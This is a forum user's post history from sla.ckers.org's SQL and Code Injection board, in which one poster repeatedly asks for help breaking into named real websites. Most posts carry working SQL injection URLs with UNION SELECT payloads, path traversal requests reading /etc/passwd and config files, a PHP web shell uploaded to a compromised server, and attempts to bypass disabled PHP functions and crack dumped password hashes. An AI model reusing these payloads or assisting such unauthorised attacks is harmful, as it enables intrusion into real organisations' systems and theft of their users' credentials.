Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
How do you completely compromise a machine given a text box or badly validated input box? This is a place to talk about code issues (PHP includes, null byte injection, backticks, pipe, etc...) as well as how to properly construct an SQL injection attack. 

Pages: 12Next
Current Page: 1 of 2
Results 1 - 30 of 56
1 year ago
m1cr0n
Can anyone helpme identify backend backend dbms of this website and correct injection: http://bit.ly/16ObrS6 Post: TipoPDC=comboshdtvplus Thanks.
Forum: SQL and Code Injection
1 year ago
m1cr0n
ANyone has idea to bypass asp with null byte on this link: http://bit.ly/17lNtvV Thanks.
Forum: SQL and Code Injection
2 years ago
m1cr0n
one up to verify if anyone have any idea... Thanks
Forum: SQL and Code Injection
3 years ago
m1cr0n
http://bit.ly/nwU7y1 Anyone can help me make inject on this website? Thanks
Forum: SQL and Code Injection
3 years ago
m1cr0n
Hi for all. I am making injection, when I go to get username / password I got this: Username : ŒŠ‹šÍ Password : ŒŠ‹šÍ Anyone know this type of encryptation or conversion???? Thanks
Forum: SQL and Code Injection
3 years ago
m1cr0n
Tools that ruin people's knowledge. You are trying to learn it backwards. http://www.uerj.br/lendo_anote.php?id=90 and 1*9=00 UNION SELECT null,null,null,null,table_name||CHR(36)||column_name,null,null from information_schema.columns-- - columns: cod_usu,dat_cadastr,dat_exc,flg_exc,flg_libera,idt_usu,nom_usu,tip_usu,tms_ult_acesso,txt_email,txt_senha http://www.uerj.br/lendo_anote.php
Forum: SQL and Code Injection
3 years ago
m1cr0n
index.php?do=show_foundations.php&id=null UNION SELECT 1,2,CONVERT(version() USING latin1),4,5,6,7,8,9,10,11-- ;)
Forum: SQL and Code Injection
3 years ago
m1cr0n
Hi, I never used coldfusion, Anyo has idea where is config file: http://www.sexxxyvod.com.br/portal/copa/downloads/download.cfm?myfile=../../Application.cfc Thanks
Forum: SQL and Code Injection
3 years ago
m1cr0n
Look: http://blackhistorycanada.ca/arts.php?themeid=44&id=7 and 1=0 UNION SELECT null,version(),null,null,null,null,null,null-- -
Forum: SQL and Code Injection
3 years ago
m1cr0n
Hi for all, I am trying to ready anything with dompdf in one site, but with no longer results. Maybe dompdf isn't configured. Any idea? The link: http://bit.ly/lsebfN Thanks Bye
Forum: SQL and Code Injection
3 years ago
m1cr0n
Hi, i am trying inject on this site: http://extranet.vivo-ne.com.br/agentes/cgi-bin/esqueci_senha.plx?login=aaaa'&enviar=enviar But when I try any keyword, he block me. Any idea to got dbname or other things? Thanks.
Forum: SQL and Code Injection
3 years ago
m1cr0n
Hi for all, I got one config file with xpcmdshell, but appear base64, but, isn't. DBConnection=Z0yz5Da9a5UKbY3eEJVLo3UQ7akPuH2UQFGu9mKZbcFFDrDTZIx9gkUeldZiqHuGW1e48y u4Na5ZV6j7PrUupFZKvf4wvjO0fm2I1xKYUaZ0f5jXEpBNqGhwk8QQ4kqGQ1/8wTCsfIRSA4zAFopNrn t/59MvqWKOVF+o+zC3LqlWU7mvDph6klZSteg+um+Idl299jq0Z4RYBYz3LapnlEMej/c8rHyOQ0f82z G/YdpjTKn3X9kO4w== Anyone knows this type of hash? Thanks.
Forum: SQL and Code Injection
3 years ago
m1cr0n
Hi for all A error in site, with this can download passwd: http://us.lge.com/filedown.do?filepath=1000000305&fileName=../../../../../../etc/passwd I try to find apache config. file with reiners tutorial. but nothing... Only passwd download is that I got.
Forum: SQL and Code Injection
3 years ago
m1cr0n
Hi, I am trying to download mysql config file, but I cannot found. Here is the link: http://www.b2winc.com/misc/download?url=/../interadmin/inc/functions.php 1 --> Url rewrite rules are in .htaccess . 2 --> I can get the the root password hash: *C63A53D300B2273547F2F3F777CD2CEE17F18410 Thanks.
Forum: SQL and Code Injection
3 years ago
m1cr0n
The table is like this: --|-------------------------| id| password | --|-------------------------| 1 | 1A-F8-58-E7-4A-1D-11-9A | 2 | 11-D3-A4-37-9C-EA-0B-81 | 3 | 50-A7-85-79-E5-88-00-BD | 4 | D1-01-F1-46-DC-D7-74-45 | 5 | AB-D0-EB-DF-5E-6D-06-92 | 6 | 3A-40-4F-A4-57-E4-8D-CF | 7 | 44-AF-A5-62-08-3C-99-56 | 8 | 3B-D9-E5-1E-88-F5-96-12 |
Forum: SQL and Code Injection
3 years ago
m1cr0n
here is the link... I will keep trying: http://bit.ly/h7U7hc
Forum: SQL and Code Injection
3 years ago
m1cr0n
Disable functions : passthru,show_source,shell_exec,system,pcntl_exec,popen,pclose,proc_open,proc_nice,proc_terminate,proc_get_status,proc_close,leak,apache_child_terminate,posix_kill,posix_mkfifo,posix_setpgid,posix_setsid,posix_setuid What function can I use now to list files?
Forum: SQL and Code Injection
3 years ago
m1cr0n
Hi, I got one sql injectio, and upload many tools, but don't show dir list, after many tries, i uploaded a simple system($get['c']): http://bit.ly/gKImVz Show me: Warning: system() has been disabled for security reasons in Has one method to bypass this? Thanks
Forum: SQL and Code Injection
3 years ago
m1cr0n
19. Hash
Anyone know this type of hash? K7lTa5pfbcARo084NkJ6jaFw7qm8N6EE6YAJmOz4Qn4= NVVRrfQWjeGkd1d1G9uNA7Z467b7E7IE6YAJmOz4Qn4= yY54gihNrSva5ynsbRe8X55IwJDOTvM22bE5i+z4Qn4= Thanks
Forum: SQL and Code Injection
3 years ago
m1cr0n
Hi, I am trying to upload a simple php script to server : <? system($_GET['c']); ?> But when upload is complete, I read the file and show me this: <? system($_GET[\'c\']); ?> Have a encode to make this work or other method? Thanks --> accept " and work with ""
Forum: SQL and Code Injection
3 years ago
m1cr0n
I am trying a injection on here: http://www.gree.com.br/pt/ver-produto.php?id=5 But with not success, because when I add any and , stay loading... loading and nothing. Can anyone helpme? Thanks
Forum: SQL and Code Injection
4 years ago
m1cr0n
No one idea...!? I have 2 tables inside a db, with password column with this (that I think hash) hex characters...
Forum: SQL and Code Injection
4 years ago
m1cr0n
Hi for all, I make a injection in onme site, and he show me this hash's: 78-32-A7-59-3E-0D-D7-4E 91-8F-1D-04-6C-22-24-A7 A7-4B-DE-C6-B8-B4-CA-C8 1A-F8-58-E7-4A-1D-11-9A Anyone knows this type of hash? Wich program I use to try to decrypt with rainbow tables, or brute-force. Thanks
Forum: SQL and Code Injection
4 years ago
m1cr0n
I tried a blind with no longer results... sqlmap results: the back-end DBMS is Microsoft SQL Server web application technology: PHP 5.2.6, Apache back-end DBMS: Microsoft SQL Server Unknown sqlmap was not able to fingerprint the back-end database :-(
Forum: SQL and Code Injection
4 years ago
m1cr0n
url encoded, don't work too... Link: http://www.falevono.com.br/portal/_download/dl.php?file= Thanks for all that trying to help .
Forum: SQL and Code Injection
4 years ago
m1cr0n
;) Very good! "The Leader in Advancing Online Confidence" Make me smile.
Forum: Full Disclosure
4 years ago
m1cr0n
Hi for all... I found one download file, coded in php, called dl.php, this file are in subdir(site.com/download/dl.php), and download a cfgs files(dl.php?file=2106.cfg). I has downloaded the dl.php(dl.php?file=dl.php), here is the code: <?php // fool the http server and client browser into thinking the file name // passed in is coming back as a application attachment to save as a file
Forum: SQL and Code Injection
4 years ago
m1cr0n
Hello everybody, Today I am trying make injection in one site, I have found only one point of injection, but, I can't do nothing, take a look: http://www.getnet-tecnologia.com.br/ajax/ajax.php?url=/index_novo/index.php%3Farea%3D6%26hash%3D4e9f92b1d19b0e90e3582fa2f683b94ae0830638%26mid%3D754%20union%20select%20null http://www.getnet-tecnologia.com.br/ajax/ajax.php?url=/index_novo/index.php%3
Forum: SQL and Code Injection
4 years ago
m1cr0n
Hi for all, I am looking this site: http://www.ricardoeletro.com.br/Pagamento/buscarOutrasFormas/20956 post: bandeiraId=2 When I add ', show me this error: "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\') OR PCB.BandeiraId IS NULL) GROUP BY P.PromocaoId, P.DataCadastro, P.Tipo, ' at line 15"
Forum: SQL and Code Injection
4 years ago
m1cr0n
Hi, when a I making aqli on site, union select don't show the columns: http://www.mix.phoneclub.com.br/backoffice/boleto/index.php?id=329666' order by 103;%00 how to do in this situation? Thanks
Forum: SQL and Code Injection
Pages: 12Next
Current Page: 1 of 2